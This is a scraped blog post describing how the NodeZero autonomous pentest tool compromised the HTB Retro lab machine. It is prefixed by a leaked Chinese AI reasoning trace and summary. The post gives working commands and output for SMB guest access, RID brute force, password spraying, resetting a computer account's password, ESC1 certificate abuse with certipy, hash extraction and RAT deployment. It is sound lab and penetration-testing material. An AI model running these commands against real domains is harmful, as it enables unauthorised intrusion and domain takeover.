嗯,用户让我帮忙总结一篇文章,控制在100字以内,而且不需要用“文章内容总结”之类的开头。首先,我需要仔细阅读这篇文章,理解它的主要内容。 文章主要讲的是NodeZero如何自主解决HTB Retro机器。分为两部分:第一部分是获取用户标志,第二部分是获取根标志。第一部分中,NodeZero通过guest账户进入,然后利用RID循环和密码喷射找到trainee用户的密码,进而获取用户标志。整个过程用了不到12分钟。 第二部分更复杂,NodeZero同时进行两条攻击路径。一条是发现ADCS漏洞,但因为权限不足被搁置;另一条是找到一个弱计算机账户BANKING$并控制它。然后将两条路径结合,利用BANKING$的权限绕过ADCS限制,最终获取域管理员权限并部署RAT获取根标志。 总结的时候要抓住关键点:NodeZero自主完成攻击、两部分路径、技术手段如密码喷射、漏洞利用、权限提升等。控制在100字以内的话,需要简洁明了地表达这些内容。 </think> NodeZero自主完成了对HTB Retro机器的攻击,通过测试guest访问、密码喷射和RID循环获取用户标志,并结合ADCS漏洞和计算机账户控制实现域管理员权限提升,最终获取根标志。 2025-11-10 14:0:0 Author: horizon3.ai(查看原文) 阅读量:19 收藏
This post will dive into how NodeZero autonomously solved the HTB Retro machine. These attack paths were discovered and executed entirely by NodeZero with no human or manual intervention.
Part 1: The User Flag – From Guest to Flag
Let us walk through the following attack graph created by NodeZero demonstrating the steps taken to find the user flag. This attack path took NodeZero just 11 minutes and 47 seconds to execute.
From the start, NodeZero’s autonomous engine treats the target as a black box. Its initial reconnaissance identifies an open SMB port.
1. Guest Access
NodeZero immediately tests common, high-impact misconfigurations. It attempts an SMB login as the guest user with a blank password and succeeds. This single finding provides an initial foothold and reveals a list of shares, most notably Notes and Trainees.
$ crackmapexec smb 10.129.26.212 --smb-timeout 5 -u guest -p "" --shares
SMB 10.129.26.212 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.26.212 445 DC [+] retro.vl\guest:
SMB 10.129.26.212 445 DC [*] Enumerated shares
SMB 10.129.26.212 445 DC Share Permissions Remark
SMB 10.129.26.212 445 DC ----- ----------- ------
SMB 10.129.26.212 445 DC ADMIN$ Remote Admin
SMB 10.129.26.212 445 DC C$ Default share
SMB 10.129.26.212 445 DC IPC$ READ Remote IPC
SMB 10.129.26.212 445 DC NETLOGON Logon server share
SMB 10.129.26.212 445 DC Notes
SMB 10.129.26.212 445 DC SYSVOL Logon server share
SMB 10.129.26.212 445 DC Trainees READ 2. Chaining Discoveries to Get a User
A guest account is good, but a real user is better. NodeZero autonomously chains its next actions based on this new access:
Enumerate Users: It leverages its guest permissions to perform a RID brute-force attack, which confirms a list of valid domain users, including one named trainee.
netexec smb 10.129.26.212 -u guest -p "" --rid-bruteFind the Weakness: With a valid username, NodeZero’s password spray module automatically tests a list of common, weak passwords. It quickly finds a match: trainee/trainee
$ crackmapexec smb 10.129.26.212 -u trainee --shares -d RETRO.VL -p trainee --smb-timeout 5
SMB 10.129.26.212 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:RETRO.VL) (signing:True) (SMBv1:False)
SMB 10.129.26.212 445 DC [+] RETRO.VL\trainee:trainee
SMB 10.129.26.212 445 DC [*] Enumerated shares
SMB 10.129.26.212 445 DC Share Permissions Remark
SMB 10.129.26.212 445 DC ----- ----------- ------
SMB 10.129.26.212 445 DC ADMIN$ Remote Admin
SMB 10.129.26.212 445 DC C$ Default share
SMB 10.129.26.212 445 DC IPC$ READ Remote IPC
SMB 10.129.26.212 445 DC NETLOGON READ Logon server share
SMB 10.129.26.212 445 DC Notes READ
SMB 10.129.26.212 445 DC SYSVOL READ Logon server share
SMB 10.129.26.212 445 DC Trainees READ 3. Cashing In
NodeZero immediately understands that the new trainee credentials are more powerful than the guest account. It re-enumerates the SMB shares as this new user and finds it now has READ access to the Notes share. A quick enumeration of that share’s contents reveals user.txt and the flag is captured.
$ smbclient \\10.129.26.212\Notes -c get "user.txt" 90dcf384-ad3e-4cea-b1b1-b18e0c61c645 -U RETRO.VL\trainee%trainee
cbda362cff209907****************This entire chain – from finding a port, to testing guest access, to RID cycling, to password spraying, to finding the flag – was executed in sequence by NodeZero with no human guidance.
Part 2: The Root Flag – An Autonomous, Parallel Attack
This is where NodeZero’s autonomous engine truly shines. Getting the root flag wasn’t a single linear path. NodeZero identified, pursued and autonomously fused two separate attack paths in parallel to achieve its goal.
Path A: The “Locked Door” (ADCS Vulnerability)
Using the trainee credentials, NodeZero continued to enumerate the domain. It quickly identified a high-impact vulnerability in Active Directory Certificate Services (ADCS).
certipy find -output h3 -enabled -target-ip 10.129.26.212 -u [email protected] -p trainee- Discovery: A certificate template named
RetroClientswas found to be vulnerable to ESC1. - The “Why”: This vulnerability is critical because it allows a low-privilege user to request a certificate as if they were a high-privilege user. In this case, by specifying an administrator’s UPN.
- The Blocker: NodeZero analyzed the template and saw the catch. To enroll, a user has to be in the
Domain Admins,Domain Computers, orEnterprise Adminsgroup. Thetraineeuser was in none of them.
For a human, this might be a temporary dead end. For NodeZero, it is just a problem to solve. It parked this attack path, knowing the exact “key” it needed: a user in one of those three groups.
Path B: The “Key” (Finding a Weak Computer Account)
While Path A was being analyzed, the other NodeZero modules were not idle. They were simultaneously hunting for any other weaknesses on the network.
- Discovery: This hunt led to a critical finding. NodeZero identifies the domain account
BANKING$. NodeZero attempts to use the computer’s hostname as a password and discovers that its password was vulnerable to a reset. - The “Why”: Computer accounts are still accounts. More importantly, all computer accounts are members of the
Domain Computersgroup by default. - The Action: NodeZero immediately seized this opportunity, reset the account’s password, and took control of
BANKING$
python3 /opt/h3/rpcchangepwd.py RETRO.VL/BANKING$:[email protected] -newpass 1**************fThe “Fusion”: Connecting the Dots
This is the moment that demonstrates true autonomous intelligence. NodeZero’s central “brain” instantly connected the dots from its two parallel operations.
- Path A was blocked, needing a user in the
Domain Computersgroup. - Path B just compromised
BANKING$, a user in theDomain Computersgroup.
The “parked” ADCS attack was immediately re-activated. NodeZero now had all of the ingredients:
- It uses its new
BANKING$account (the “Key”). - To exploit the
RetroClientstemplate (the “Locked Door”) - To request a certificate impersonating
jburley, a Domain Administrator it had previously enumerated.
$ certipy req -target-ip 10.129.26.212 -u [email protected] -ca retro-DC-CA -template RetroClients -upn [email protected] -out user -sid S-1-5-21-2983547755-698260136-4283918172-1107 -key-size 4096 -p 1**************f
[!] Failed to resolve: RETRO.VL
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN '[email protected]'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-1107'
[*] Saved certificate and private key to 'user.pfx'From Admin to Root
With a valid certificate for a Domain Admin, NodeZero autonomously performs the final steps:
1. Get Admin Hash
It uses the jburley certificate to authenticate and extract the NTLM hash. This is an instance of the “UnPAC the Hash” attack.
certipy auth -pfx user.pfx -dc-ip 10.129.26.212 -domain RETRO.VL -u jburley2. Deploy RAT
It uses this hash to deploy its own implant (the NodeZero RAT) directly onto the endpoint gaining full SYSTEM-level access.
$ rat_cli.sh wait-for-checkin 140c72da-55b2-4021-8884-0a35a93c5fe0 {
"correlation_id": "140c72da-55b2-4021-8884-0a35a93c5fe0",
"username": "SYSTEM",
"pid": 1000,
"implant_type": {
"Windows": {
"username": "SYSTEM",
"pid": 1000,
"process_token": {
"integrity_level": {
"name": "System",
"value": 4,
"sid": "S-1-16-16384"
},
"groups": [
"S-1-5-32-544",
"S-1-1-0",
"S-1-5-11",
"S-1-16-16384"
],
"privileges": [
"SeAssignPrimaryTokenPrivilege",
"SeLockMemoryPrivilege",
"SeIncreaseQuotaPrivilege",
"SeTcbPrivilege",
"SeSecurityPrivilege",
"SeTakeOwnershipPrivilege",
"SeLoadDriverPrivilege",
"SeSystemProfilePrivilege",
"SeSystemtimePrivilege",
"SeProfileSingleProcessPrivilege",
"SeIncreaseBasePriorityPrivilege",
"SeCreatePagefilePrivilege",
"SeCreatePermanentPrivilege",
"SeBackupPrivilege",
"SeRestorePrivilege",
"SeShutdownPrivilege",
"SeDebugPrivilege",
"SeAuditPrivilege",
"SeSystemEnvironmentPrivilege",
"SeChangeNotifyPrivilege",
"SeUndockPrivilege",
"SeManageVolumePrivilege",
"SeImpersonatePrivilege",
"SeCreateGlobalPrivilege",
"SeIncreaseWorkingSetPrivilege",
"SeTimeZonePrivilege",
"SeCreateSymbolicLinkPrivilege",
"SeDelegateSessionUserImpersonatePrivilege"
]
},
"path_to_binary": "C:\\Windows\\Temp\\tmp-lcache.exe"
}
}
}3. Get Root Flag
The RAT is instructed to read the root.txt flag from the Administrator’s desktop, completing the full, autonomous compromise of the machine.
$ get.sh 40fce9c3f09024bca***************Conclusion
HTB Retro is a fantastic, classic machine. It’s not designed to be very difficult, but it perfectly demonstrates a textbook attack path: chaining weak credentials into a critical Active Directory misconfiguration. The point isn’t that a human couldn’t find this. The point is that NodeZero did, autonomously and quickly. It shows NodeZero’s ability to correctly identify, chain, and fuse common-but-critical vulnerabilities.
如有侵权请联系:admin#unsafe.sh